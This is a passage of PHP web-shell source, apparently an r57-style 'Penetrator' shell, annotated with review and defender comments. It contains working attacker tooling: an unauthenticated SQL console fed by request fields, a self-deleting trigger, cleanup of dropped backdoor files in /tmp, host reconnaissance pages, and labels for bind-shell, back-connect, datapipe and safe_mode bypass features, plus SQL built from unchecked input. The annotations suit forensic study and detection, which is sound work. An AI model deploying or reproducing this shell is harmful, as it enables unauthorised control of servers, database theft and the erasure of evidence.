        $_SESSION['password'] = $_POST['pword1'];
}

// No credentials in the session yet: show the login form.
if (!isset($_SESSION['user']) || !isset($_SESSION['password'])){
        echo"<div align=center>";
        echo"<h2>Enter data server Penetrator</h2>\n";
        // show_login() is always given a defined value; "" when no list exists.
        If(!isset($dbnamearray)){
                $dbnamearray="";
        }
        show_login($dbnamearray);
        echo"</div>";
}else{
        //show logout option.
        echo"<div align=right>";
        endsess();
        echo"</div>";
}
  1354. //*****dbname
// Request parameter intake. Each value below is copied from the request
// unchanged; none is validated before it later reaches SQL text or HTML.
if(isset($_POST['dbname'])){
        $dbname=$_POST['dbname'];
    $_SESSION['dbname']= $_POST['dbname'];
}
//***** Host
// The database host is also taken from the request and kept in the session.
if(isset($_POST['host'])){
    $host=$_POST['host'];
    $_SESSION['host']=$_POST['host'];
}
//******set tablename
// A tablename in the query string takes precedence over a posted one.
if(isset($_GET['tablename']) ){
        $tablename=$_GET['tablename'];
}elseif(isset($_POST['tablename'])){
        $tablename=$_POST['tablename'];
}
//********** pagemax
// Records-per-page: accepted into the session when it compares greater than 0
// and the loop below raises no objection.
// NOTE(review): the loop does not look like an effective digits-only check.
// It calls count() on what is normally a string and compares a single
// character with 9, which a digit character never exceeds; ctype_digit()
// would express the apparent intent. count() on a string is also an error
// on PHP 8.
if(isset($_POST['pagemax'])){ //&& is_int($_POST['pagemax'])){
    $isnum=true;
    for($o=0; $o<count($_POST['pagemax']); $o++){
            if($_POST['pagemax'][$o]>9){
                $isnum=false;
            }
    }
    if($_POST['pagemax']>0 && $isnum){
        $_SESSION['pagemax']=$_POST['pagemax'];
    }
}
 // The session copy is what the rest of the page uses.
 if(isset($_SESSION['pagemax'])){
    $pagemax=$_SESSION['pagemax'];
 }
  1385. //******** create a new Database ************
// Handles the "create database" form rendered by showdb(): creates the
// database, makes it the session's current database and switches to it.
// NOTE(review): the posted ndbname is interpolated directly into the CREATE
// DATABASE and USE statements, with no identifier quoting or allow-list, and
// is echoed back into the page unescaped via $_SESSION[dbname].
if(isset($_POST['cndb'])){
    connectmysql();
        $sql="create database $_POST[ndbname]";
        $result=exequery($sql, " ", $_POST['ndbname']);
        if ($result){
                $_SESSION['dbname'] = $_POST['ndbname'];
        $sql="Use $_POST[ndbname]";
            $result=exequery($sql, " ", $_POST['ndbname']);
        if($result){
            // The heading text arrives here as literal question marks; the
            // original wording is not recoverable from this copy.
            echo"<h2>????? ????? $_SESSION[dbname] </h2>\n";
        }
        }
}
  1399.  
  1400. //*********************************************
// Logged in, but no database chosen anywhere yet (session, post or list):
// show the database chooser.
if (! isset($_SESSION['dbname']) && ! isset($dbnamearray) && ! isset($_POST['dbname']) && isset($_SESSION['user'])){ //*********post
        //Database names
        showdb();
}
//************************ Choose DB *************
// An explicitly empty posted dbname (the logout handler above also sets this)
// brings the chooser up again.
if(isset($_POST['dbname']) && $_POST['dbname']==""){
    showdb();
}

//**********
// Resolve the working database name. The session value wins, then the posted
// 'dbname', then the posted 'dbna'; the latter two are also written back to
// the session. Note that the dbname intake earlier in the script already
// copies a posted 'dbname' into the session, so the first branch is the one
// normally taken.
if (isset($_SESSION['dbname']) || isset($_POST['dbna']) || isset($_POST['dbname'])){
//*************************************
                //connection

                if (isset($_SESSION['dbname'])){
                        $dbsetname = $_SESSION['dbname'];
                }elseif(isset($_POST['dbname'])){
                        $dbsetname = $_POST['dbname'];
                        $_SESSION['dbname'] = $_POST['dbname'];
                }else{
                        $dbsetname = $_POST['dbna'];
                        $_SESSION['dbname'] = $_POST['dbna'];
                }
}
  1425. //*************************** we have a DB set
  1426. if(isset($dbsetname) && $dbsetname!=""){
  1427.                     $link= connectmysql();
  1428.             //echo"DBS: $dbsetname";
  1429.                     $conn = connectdb($dbsetname, $link);
  1430.  
  1431. //*********** Drop Table **************
  1432.         if(isset($_POST['deltable'])){
  1433.         $showall=false;
  1434.                 $tablename=$_POST['tablename'];
  1435.                 echo"<h1>!!! Warning!!!<br>You are trying to Clear this table $tablename<br>";
  1436.                 echo"Are you sure you want to do process?</h1>\n";
  1437.                 $va="Drop $tablename";
  1438.                 goto($tablename, $dbname,$action, 'del', 'droptab', $va );
  1439.         }
  1440.         if(isset($_POST['droptab'])){
  1441.                 $tablename=$_POST['tablename'];
  1442.                 $dsql = "drop table $tablename";
  1443.                 $result=exequery($dsql, $tablename, $dbname);
  1444.                 unset($tablename); //="false";
  1445.                 unset($_POST['tablename']);
  1446.         }
  1447. //*****************Write Your Own Query *****************
  1448.         if(isset($_POST['wyoq'])){  //post
  1449.                 $value="The main facade of Scarpt";
  1450.                 goto($tablename, $dbname, $action, 'but', 'start', $value );
  1451.                 echo"<form method='post'>\n";
  1452.                 echo"<input type='hidden' name='dbname' value=$dbname>\n";
  1453.                 //echo"<input type=text name='wyqota' width='500px' style='overflow-x:visible;'>\n";
  1454.  
  1455.                 echo"<textarea name='wyoqta' cols='60' rows='5' style='overflow-y:visible'></textarea>\n";
  1456.  
  1457.                 echo"<br><input class=but type=submit name='runquery' value='Execute Query'>\n";
  1458.                 echo"</form><br>\n";
  1459.         }
  1460.  
  1461.         if(isset($_POST['runquery'])){
  1462.                 $wyoqta = StripSlashes($_POST['wyoqta']);
  1463.                 $result=exequery($wyoqta, " ", " ");
  1464.  
  1465.                 if(@mysql_num_rows($result) >0){
  1466.                          $numrows=mysql_num_rows($result);
  1467.                         $flds=mysql_num_fields($result);
  1468.                         echo"<table>";
  1469.                         for($r=0; $r < $numrows; $r++){
  1470.                                 echo"<tr>";
  1471.                                 $row=mysql_fetch_array($result);
  1472.                                 for($col = 0; $col < $flds; $col ++){
  1473.                                         $nslash = StripSlashes($row[$col]);
  1474.                                         echo"<td>$nslash</td>";
  1475.                                 }
  1476.                                 echo"</tr>";
  1477.                         }
  1478.                         echo"</table>";
  1479.                 }elseif (mysql_affected_rows()){
  1480.                         echo" Number of Rows affected: ".mysql_affected_rows();
  1481.                 }else{
  1482.                         echo" Nothing returned from the query.";
  1483.                 }
  1484.         }
  1485. // ****************List Tables***************************
  1486.  
  1487.         if( ! isset($tablename) || $tablename==" " ){
  1488.                 $dbname=$_SESSION['dbname'];
  1489.                 $result = mysql_list_tables($_SESSION['dbname']);
  1490.                  $numtab = mysql_num_rows ($result);
  1491.                  if($numtab == 1){
  1492.                         $_SESSION['tablename'] =mysql_tablename($result, 0);
  1493.                  }
  1494.  
  1495. //***************** Buttons ******************************
  1496.                 if (isset($_POST['runquery'])){
  1497.                         $dbname=$_SESSION['dbname'];
  1498.                         $value="$dbname Start"; //Table Manager Start
  1499.                         goto("", $_SESSION['dbname'], $action, 'but', 'tablestart', $value );
  1500.  
  1501.                 }elseif (! isset($_POST['wyoq']) && ! isset($_POST['runquery'])){ //write your own query.
  1502.                         echo"<table width=40% border=0 align='left' >\n";
  1503.                         echo"<tr><td>";
  1504.  
  1505.                         $va="The establishment of a new scale";
  1506.                         goto("", $_SESSION['dbname'], "create.php", 'but', 'create', $va );
  1507.           //  echo"<a href=create.php class='crt'>Create new Table</a>\n";
  1508.                         echo"</td><td>";
  1509.  
  1510.         $value="The main facade"; //Choose DB
  1511.                 goto("", "", $action, 'but', 'db', $value );
  1512.                 echo"</td>\n";
  1513.  
  1514.                         $value="Write Your Own Query";
  1515.                         goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value );
  1516.  
  1517.                         echo"</td></tr>";
  1518.                         echo"</table><br><br><br><br><div style='clear:both;'></div>";
  1519.  
  1520.                         echo"<table width=100% border=0 align='center' >\n";
  1521.                         for ($i =0; $i < $numtab; $i++) {
  1522.  
  1523.                                 $tb_names[$i] = mysql_tablename($result, $i);
  1524.                                 echo"<tr class='frow'><td align='center'>\n";
  1525.  
  1526.                                 $va="The agenda* $tb_names[$i]";
  1527.                                 goto($tb_names[$i], $_SESSION['dbname'],$action, 'but', $tb_names[$i], $va );
  1528.                                 echo"</td><td  align='center' valign='middle'>\n";
  1529.  
  1530.                                 $va="Survey agenda $tb_names[$i]";
  1531.                                 goto($tb_names[$i], $_SESSION['dbname'],$action, 'del', 'deltable', $va );
  1532.                                 echo"</td><td  align='center' valign='middle'>\n";
  1533.  
  1534.                                 $va="Alter Table $tb_names[$i]";
  1535.                                 goto($tb_names[$i], $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va );
  1536.                                 echo"</td><td align='center' valign='middle'>\n";
  1537.  
  1538.                                 searchtableform($tb_names[$i], $_SESSION['dbname']);
  1539.                                 echo"</td><td>";
  1540.                 //Table size in bytes
  1541.                echo mysize($_SESSION['dbname'],$tb_names[$i]);
  1542.  
  1543.                 echo"</td></tr>\n";
  1544.                         }//for
  1545.                         echo"</table>\n";
  1546.                 }
  1547.  
  1548.         }else{ //tablename is set
  1549. //***************** menu *****************************************
  1550.                 echo"<table><tr class='frow'><td>\n";
  1551.                 $value="$_SESSION[dbname] Start"; //Ex Table Manager Start
  1552.                 goto($tablename, $_SESSION['dbname'], $action, 'but', 'tablestart', $value );
  1553.                 echo"</td>\n";
  1554.  
  1555.         echo"<td>\n";
  1556.         $value="The main facade"; //Choose DB
  1557.                 goto("", "", $action, 'but', 'start', $value );
  1558.                 echo"</td>\n";
  1559.  
  1560.         echo"<td>\n";
  1561.         $value="Write Your Own Query";
  1562.                 goto(" ", $_SESSION['dbname'], $action, 'but', 'wyoq', $value );
  1563.         echo"</td>\n";
  1564.  
  1565.                 if (!isset($_POST['add']) && !isset($_POST['deltable']) && isset($tablename)){
  1566.                         echo"<td>";
  1567.                         //$tablename = $_POST['tablename'];
  1568.                         $va="Add a $tablename Record";
  1569.                         goto($tablename, $_SESSION['dbname'], 'alter.php', 'but', 'add', $va );
  1570.                         echo"</td>\n";
  1571.                 }
  1572.  
  1573.                 if (!isset($_POST['deltable'])){
  1574.                         echo"<td>\n";
  1575.                         searchtableform($tablename, $_SESSION['dbname']);
  1576.                         echo"</td>\n";
  1577.                 }
  1578.                 echo"</tr></table>\n";
  1579.                 echo"<br />\n";
  1580.  
  1581. //**************************************************
  1582.  
  1583.                 if(isset($_POST['addrec'])){
  1584.            // $showall=false;
  1585.                         $result=addrecord($tablename, $_SESSION['dbname'], $_POST['array']);
  1586.                 }elseif(isset($_POST['add'])){
  1587.             $showall=false;
  1588.                         addform($tablename, $_SESSION['dbname']);
  1589.                 }elseif(isset($_POST['delete'])){
  1590.                         //delete record has been pushed
  1591.            // $showall=false;
  1592.                         $whr=buildwhr($_POST['pk'], $_POST['pv']);
  1593.                         $sql = "delete from $tablename where $whr";
  1594.                         $result=exequery($sql, $tablename, $_SESSION['dbname']);
  1595.                 }elseif (isset($_POST['edit'])){//Edit
  1596.             $showall=false;
  1597.                         $whr = buildwhr( $_POST['pk'], $_POST['pv']);
  1598.                         //$tablename = $_SESSION['tablename'];
  1599.                         $sql= "Select * from $tablename where $whr";
  1600.  
  1601.                         $result=exequery($sql, $tablename, $_SESSION['dbname']);
  1602.                         editform($tablename, $_SESSION['dbname'], $result, 'edit', $_POST['pk'], $_POST['pv']);
  1603.                 }elseif(isset($_POST['editrec'])){
  1604.            // $showall=false;
  1605.                         $result=editrec($_SESSION['dbname'],$tablename, $_POST['pk'], $_POST['pv'], $_POST['array']);
  1606.                 }
  1607. //**************** Search ************************************
  1608.                 if(isset($_POST['searchval'])){
  1609.                         $searchval=$_POST['searchval'];
  1610.                 }elseif(isset($_GET['searchval'])){
  1611.                         $searchval=$_GET['searchval'];
  1612.                 }else{
  1613.                         $searchval="";
  1614.                 }
  1615.  
  1616.                 if (isset($_GET['tablename'])){
  1617.                         $tablename = $_GET['tablename'];
  1618.                 }
  1619.  
  1620.                 if((isset($_POST['search'])|| isset($searchval)) && $searchval !=""){
  1621.                         $result=searcht($tablename, $_SESSION['dbname'],  $searchval);
  1622.                 }else{
  1623.                         //Display All
  1624.                         $query = "select * from $tablename";
  1625.                         $result=exequery($query, $tablename, $_SESSION['dbname']);
  1626.                 }
  1627.  
  1628. //***************** Display record count *****************************************
  1629.         if($showall){
  1630.             $num_rows = mysql_num_rows($result);
  1631.             //Workout whick page to display
  1632.                     if(!isset($_GET['pg']) && !isset($pg)){
  1633.                             $beg=0;
  1634.                 $pg=0;
  1635.                     }else{
  1636.                 if(isset($_GET['pback'])){
  1637.                     $pg=$_GET['pg'];
  1638.                 }else{
  1639.                     $pg=$_GET['pg'];
  1640.                 }
  1641.                  if($pg < 0 ){
  1642.                     $pg=0;
  1643.                 }
  1644.                 if($pg > $num_rows/$pagemax){
  1645.                     $pg=ceil($num_rows/$pagemax)-1;
  1646.                 }
  1647.                 $beg = $pg * $pagemax;
  1648.  
  1649.                     }
  1650.                     if (!isset($_POST['add'])){
  1651.                             $pscrol=" ";
  1652.                             $pagescrol =" ";
  1653.  
  1654.                             $pagescrol = whichpage($num_rows, $pagemax, $pg, $tablename, $searchval);
  1655.  
  1656.                             echo "$pagescrol\n"; //Display next Top page menu
  1657.  
  1658.                             $flds = mysql_num_fields($result);
  1659.                             echo"<table border=0 width='100%'>\n";
  1660.                             echo"<tr class=head><td></td><td></td>\n";
  1661.                             $fields = mysql_list_fields( $_SESSION['dbname'], $tablename);
  1662.  
  1663.                             $z=0;
  1664.                             $x =0;
  1665.                             $pkfield=array();
  1666.  
  1667. //*************Display each of the field names.***************************
  1668.                             for ($i = 0; $i < $flds; $i++) {
  1669.                                         echo "<td>".mysql_field_name($fields, $i)."</td>\n";
  1670.  
  1671.                                     //Find the primary key
  1672.                                     $flagstring = mysql_field_flags ($result, $i);
  1673.                                     if(eregi("primary",$flagstring )){
  1674.                                             $pk[$z] = $i;
  1675.  
  1676.                                             $pkfield[$z]= mysql_field_name($fields, $i);
  1677.                                             $z++;
  1678.                                     }
  1679.                             }
  1680.                             echo"</tr>\n";
  1681.                             $tbl=$tablename;
  1682.                             //if(isset($pk)){
  1683.                             if($z > 0){
  1684.                                     $cpk=count($pk);
  1685.                             }else{
  1686.                                     $cpk=0;
  1687.                             }
  1688.  
  1689. //************Display each row from the table.********************************
  1690.  
  1691.                             for ($s=$beg; $s < $beg + $pagemax; $s++){
  1692.                                     if($s < $num_rows){
  1693.                                             if (!mysql_data_seek ($result, $s)) {
  1694.                                         echo "Cannot seek to row $s\n";
  1695.                                         continue;
  1696.                                     }
  1697.                                             $row=mysql_fetch_array($result);
  1698.                                             if(!isset($pk)){
  1699.                                                     $pk=" ";
  1700.                                                     $pkfield= array();
  1701.                                             }
  1702.                                             displayrow($_SESSION['dbname'], $tbl, $pk, $pkfield, $cpk, $row, $flds);
  1703.                                     }
  1704.                             }
  1705.                     }
  1706.                     echo"</table>\n";
  1707.                     if (!isset($_POST['add']) && !isset($_POST['edit']) && !isset($_POST['deltable']) && !isset($_POST['droptab']) && !isset($_POST['wyoq']) && $tablename){
  1708.                             echo"<br>";
  1709.                             echo "$pagescrol\n"; //Display bottom next page menu
  1710.                     }
  1711.                     echo"<br><br>\n";
  1712.                  }//showall
  1713.                  if(isset($_POST['tablename'])){
  1714.                          echo"<table border=0>";
  1715.                      echo"<tr><td>";
  1716.                          $tablename=$_POST['tablename'];
  1717.                          $va="Alter Table $tablename";
  1718.                          goto( $tablename,  $_SESSION['dbname'],'alter.php', 'but', 'altertable', $va );
  1719.                          echo"</td></tr>\n";
  1720.                          echo"</table>\n";
  1721.                 }
  1722.         }
  1723. }
  1724. display_foot();
  1725. echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";  die(); }
  1726.  
  // SQL console of this web shell: runs when the POST field `cmd` equals "db_query".
  // Every connection parameter (db, db_server, db_port, mysql_l, mysql_p, mysql_db) and the
  // statement text come straight from the request body. Nothing in this block checks who is
  // asking; the file header sets $auth = 0, and any gate would have to sit outside this view.
  // Defender note: POST bodies carrying cmd=db_query together with these field names are a
  // usable log/WAF signature for this family of shell.
  1727. if (!empty($_POST['cmd']) && $_POST['cmd']=="db_query")
  1728.  {
  1729.  echo $head;
  // my_sql is declared outside this view; only its use is visible here.
  1730.  $sql = new my_sql();
  1731.  $sql->db   = $_POST['db'];
  1732.  $sql->host = $_POST['db_server'];
  1733.  $sql->port = $_POST['db_port'];
  1734.  $sql->user = $_POST['mysql_l'];
  1735.  $sql->pass = $_POST['mysql_p'];
  1736.  $sql->base = $_POST['mysql_db'];
  // Plain split on ';' - a semicolon inside a quoted literal also splits the statement.
  1737.  $querys = @explode(';',$_POST['db_query']);
  1738.  echo '<body bgcolor=#000000>';
  1739.  if(!$sql->connect()) echo "<div align=center><font face=tahoma size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
  1740.   else
  1741.    {
  1742.    if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=tahoma size=-2 color=red><b>?? ?????? ????? ????? ????????</b></font></div>";
  1743.    else
  1744.     {
  1745.     foreach($querys as $num=>$query)
  1746.      {
  // Fragments of five bytes or fewer are skipped without any message.
  1747.       if(strlen($query)>5)
  1748.       {
  1749.       echo "<font face=tahoma size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
  // NOTE(review): query() is outside this view; the branches below suggest '0' = error,
  // '1' = result set available, '2' = statement that only reports affected rows - confirm.
  1750.       switch($sql->query($query))
  1751.        {
  1752.        case '0':
  1753.        echo "<table width=100%><tr><td><font face=tahoma size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
  1754.        break;
  1755.        case '1':
  1756.        if($sql->get_result())
  1757.         {
  1758.                echo "<table width=100%>";
  // Column names and cell values are HTML-escaped before they are printed.
  1759.         foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
  1760.                $keys = @implode("&nbsp;</b></font></td><td bgcolor=#cccccc><font face=tahoma size=-2><b>&nbsp;", $sql->columns);
  1761.         echo "<tr><td bgcolor=#333333><font face=tahoma size=-2><b>&nbsp;".$keys."&nbsp;</b></font></td></tr>";
  1762.         for($i=0;$i<$sql->num_rows;$i++)
  1763.          {
  1764.          foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
  1765.          $values = @implode("&nbsp;</font></td><td><font face=tahoma size=-2>&nbsp;",$sql->rows[$i]);
  1766.          echo '<tr><td><font face=tahoma size=-2>&nbsp;'.$values.'&nbsp;</font></td></tr>';
  1767.          }
  1768.         echo "</table>";
  1769.         }
  1770.        break;
  1771.        case '2':
  1772.        $ar = $sql->affected_rows()?($sql->affected_rows()):('0');
  1773.        echo "<table width=100%><tr><td><font face=tahoma size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
  1774.        break;
  1775.        }
  1776.       }
  1777.      }
  1778.     }
  1779.    }
  // Follow-up form. in() is defined outside this view; from its arguments it presumably
  // emits hidden <input> fields, which would put the database login and password into every
  // later request body - relevant when reconstructing which account was used from captures.
  // Unlike the result table, $sql->base, $_POST['db_query'] and $_SERVER['PHP_SELF'] are
  // written into the page below without HTML escaping.
  1780.  echo "<br><form name=form method=POST>";
  1781.  echo in('hidden','db',0,$_POST['db']);
  1782.  echo in('hidden','db_server',0,$_POST['db_server']);
  1783.  echo in('hidden','db_port',0,$_POST['db_port']);
  1784.  echo in('hidden','mysql_l',0,$_POST['mysql_l']);
  1785.  echo in('hidden','mysql_p',0,$_POST['mysql_p']);
  1786.  echo in('hidden','mysql_db',0,$_POST['mysql_db']);
  1787.  echo in('hidden','cmd',0,'db_query');
  1788.  echo "<div align=center>";
  1789.  echo "<font face=tahoma size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
  // The default textarea text is a fixed string and can serve as a response-body signature.
  1790.  echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
  1791.  echo "</form>";
  // die() ends the request here, so none of the code after this branch runs for db_query.
  1792.  echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
  1793.  }
  // Self-removal: a GET request carrying the `delete` parameter unlinks this script file
  // (errors hidden by @). There is no die() here, so execution continues afterwards.
  // Incident-response note: the script may already be gone from disk at triage time; the
  // access-log entry with the `delete` parameter and any backups or filesystem snapshots are
  // then the remaining evidence of it.
  1794. if(isset($_GET['delete']))
  1795.  {
  1796.    @unlink(__FILE__);
  1797.  }
  // Clean-up of dropped artefacts: a GET request carrying `tmp` deletes seven fixed paths
  // under /tmp (errors hidden by @).
  // NOTE(review): the names line up with the 'Bind port', 'back-connect' and 'datapipe'
  // labels in the $lang table further down - presumably the sources/binaries those features
  // write; confirm against the rest of the file.
  // Defender note: any of these paths present on a host is worth treating as an indicator
  // that this shell (or a close relative) has been used there.
  1798. if(isset($_GET['tmp']))
  1799.  {
  1800.    @unlink("/tmp/bdpl");
  1801.    @unlink("/tmp/back");
  1802.    @unlink("/tmp/bd");
  1803.    @unlink("/tmp/bd.c");
  1804.    @unlink("/tmp/dp");
  1805.    @unlink("/tmp/dpc");
  1806.    @unlink("/tmp/dpc.c");
  1807.  }
  1808. if(isset($_GET['phpini']))
  1809. {
  1810. echo $head;
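  /**
   * Turn one php.ini directive value into a short display string.
   *
   * NULL becomes 'NULL', booleans become 'TRUE'/'FALSE', the empty string becomes an
   * italic "no value" marker; objects are cast to arrays and arrays are dumped with
   * print_r(). Everything that is not one of the fixed markers goes through U_wordwrap().
   *
   * @param mixed $value directive value as found in the ini_get_all() result
   * @return string display string (the "no value" marker contains literal HTML)
   */
  function U_value($value)
   {
   // Type checks run before the empty test. The original started with the loose
   // `$value == ''`, which is also true for FALSE and NULL, so those two were reported
   // as "no value" and the NULL branch could never be reached.
   if ($value === null) return 'NULL';
   if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
   if ($value === '') return '<i>no value</i>';
   if (@is_object($value)) $value = (array) $value;
   if (@is_array($value))
    {
    // Capture the print_r() dump in an output buffer instead of sending it to the page.
    @ob_start();
    print_r($value);
    $value = @ob_get_contents();
    @ob_end_clean();
    }
   return U_wordwrap((string) $value);
   }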
  /**
   * HTML-escape a string and add a <wbr /> break hint after every 100 characters.
   *
   * @param string $str raw text
   * @return string escaped text with break hints
   */
  function U_wordwrap($str)
   {
   $escaped = @htmlspecialchars($str);
   $wrapped = @wordwrap($escaped, 100, '<wbr />', true);
   // A hint that fell between the '&' and the ';' of an entity is moved to just after
   // that ';', so the entity itself stays in one piece.
   $pattern = '!(&[^;]*)<wbr />([^;]*;)!';
   return @preg_replace($pattern, '$1$2<wbr />', $wrapped);
   }
  // Body of the `phpini` branch opened above (GET parameter `phpini`): dumps every php.ini
  // directive with its local and master value as an HTML table, then ends the request.
  // Values pass through U_value(); directive names ($key) are printed as they are.
  // ws() is defined outside this view.
  // Defender note: this is host reconnaissance - the dump shows settings such as safe_mode
  // and open_basedir that the "bypass" features named in the $lang table depend on. A GET
  // request with the `phpini` parameter in the access log marks it.
  1831. if (@function_exists('ini_get_all'))
  1832.  {
  1833.  $r = '';
  1834.  echo '<table width=100%>', '<tr><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#000000><font face=tahoma size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
  1835.  foreach (@ini_get_all() as $key=>$value)
  1836.   {
  1837.   $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.$key.'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=tahoma size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
  1838.   }
  1839.  echo $r;
  1840.  echo '</table>';
  1841.  }
  // $_SERVER['PHP_SELF'] is placed in the href without escaping.
  1842. echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1843. die();
  1844. }
  // CPU information page: runs on a GET request carrying `cpu`, prints one table row per
  // line of the file "cpuinfo" (split at ':'), then ends the request.
  // NOTE(review): "cpuinfo" is a relative path, so what is read depends on the working
  // directory at this point, which is set outside this view if at all; when the read fails
  // the single '---' row is printed instead.
  // Defender note: host reconnaissance; a GET request with the `cpu` parameter marks it in
  // the access log.
  1845. if(isset($_GET['cpu']))
  1846.  {
  1847.    echo $head;
  1848.    echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
  1849.    $cpuf = @file("cpuinfo");
  1850.    if($cpuf)
  1851.     {
  1852.       $c = @sizeof($cpuf);
  1853.       for($i=0;$i<$c;$i++)
  1854.         {
  1855.           $info = @explode(":",$cpuf[$i]);
  // $info[1] is read even for lines without ':' and $r is appended to without being
  // initialised in this branch; the file header calls error_reporting(0), which hides the
  // resulting notices. File content is printed without HTML escaping.
  1856.           if($info[1]==""){ $info[1]="---"; }
  1857.           $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
  1858.         }
  1859.       echo $r;
  1860.     }
  1861.    else
  1862.     {
  1863.       echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
  1864.     }
  1865.    echo '</table>';
  1866.    echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1867.    die();
  1868.  }
  // Memory information page: runs on a GET request carrying `mem`, prints one table row per
  // line of the file "meminfo" (split at ':'), then ends the request. Same structure as the
  // `cpu` branch above it in the file.
  // NOTE(review): "meminfo" is a relative path, so what is read depends on the working
  // directory at this point, which is set outside this view if at all; when the read fails
  // the single '---' row is printed instead.
  // Defender note: host reconnaissance; a GET request with the `mem` parameter marks it in
  // the access log.
  1869. if(isset($_GET['mem']))
  1870.  {
  1871.    echo $head;
  1872.    echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
  1873.    $memf = @file("meminfo");
  1874.    if($memf)
  1875.     {
  1876.       $c = sizeof($memf);
  1877.       for($i=0;$i<$c;$i++)
  1878.         {
  1879.           $info = explode(":",$memf[$i]);
  // $info[1] is read even for lines without ':' and $r is appended to without being
  // initialised in this branch; the file header calls error_reporting(0), which hides the
  // resulting notices. File content is printed without HTML escaping.
  1880.           if($info[1]==""){ $info[1]="---"; }
  1881.           $r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
  1882.         }
  1883.       echo $r;
  1884.     }
  1885.    else
  1886.     {
  1887.       echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b> --- </b></font></div></td></tr>';
  1888.     }
  1889.    echo '</table>';
  1890.    echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  1891.    die();
  1892.  }
  1893. $lang=array(
  1894. 'eng_text1' =>'Executed command',
  1895. 'eng_text2' =>'Execute command on server',
  1896. 'eng_text3' =>'Run command',
  1897. 'eng_text4' =>'Work directory',
  1898. 'eng_text5' =>'Upload files on server',
  1899. 'eng_text6' =>'Local file',
  1900. 'eng_text7' =>'Aliases',
  1901. 'eng_text8' =>'Select alias',
  1902. 'eng_butt1' =>'Execute',
  1903. 'eng_butt2' =>'Upload',
  1904. 'eng_text9' =>'Bind port to /bin/bash',
  1905. 'eng_text10'=>'Port',
  1906. 'eng_text11'=>'Password for access',
  1907. 'eng_butt3' =>'Bind',
  1908. 'eng_text12'=>'back-connect',
  1909. 'eng_text13'=>'IP',
  1910. 'eng_text14'=>'Port',
  1911. 'eng_butt4' =>'Connect',
  1912. 'eng_text15'=>'Upload files from remote server',
  1913. 'eng_text16'=>'With',
  1914. 'eng_text17'=>'Remote file',
  1915. 'eng_text18'=>'Local file',
  1916. 'eng_text19'=>'Exploits',
  1917. 'eng_text20'=>'Use',
  1918. 'eng_text21'=>'&nbsp;New name',
  1919. 'eng_text22'=>'datapipe',
  1920. 'eng_text23'=>'Local port',
  1921. 'eng_text24'=>'Remote host',
  1922. 'eng_text25'=>'Remote port',
  1923. 'eng_text26'=>'Use',
  1924. 'eng_butt5' =>'Run',
  1925. 'eng_text28'=>'Work in safe_mode',
  1926. 'eng_text29'=>'ACCESS DENIED',
  1927. 'eng_butt6' =>'Change',
  1928. 'eng_text30'=>'Cat file',
  1929. 'eng_butt7' =>'Show',
  1930. 'eng_text31'=>'File not found',
  1931. 'eng_text32'=>'Eval PHP code',
  1932. 'eng_text33'=>'Test bypass open_basedir with cURL functions',
  1933. 'eng_butt8' =>'Test',
  1934. 'eng_text34'=>'Test bypass safe_mode with include function',
  1935. 'eng_text35'=>'Test bypass safe_mode with load file in mysql',
  1936. 'eng_text36'=>'Database . Table',
  1937. 'eng_text37'=>'Login',
  1938. 'eng_text38'=>'Password',
  1939. 'eng_text39'=>'Database',
  1940. 'eng_text40'=>'Dump database table',
  1941. 'eng_butt9' =>'Dump',
  1942. 'eng_text41'=>'Save dump in file',
  1943. 'eng_text42'=>'Edit files',
  1944. 'eng_text43'=>'File for edit',
  1945. 'eng_butt10'=>'Save',
  1946. 'eng_text44'=>'Can\'t edit file! Only read access!',
  1947. 'eng_text45'=>'File saved',
  1948. 'eng_text46'=>'Show phpinfo()',
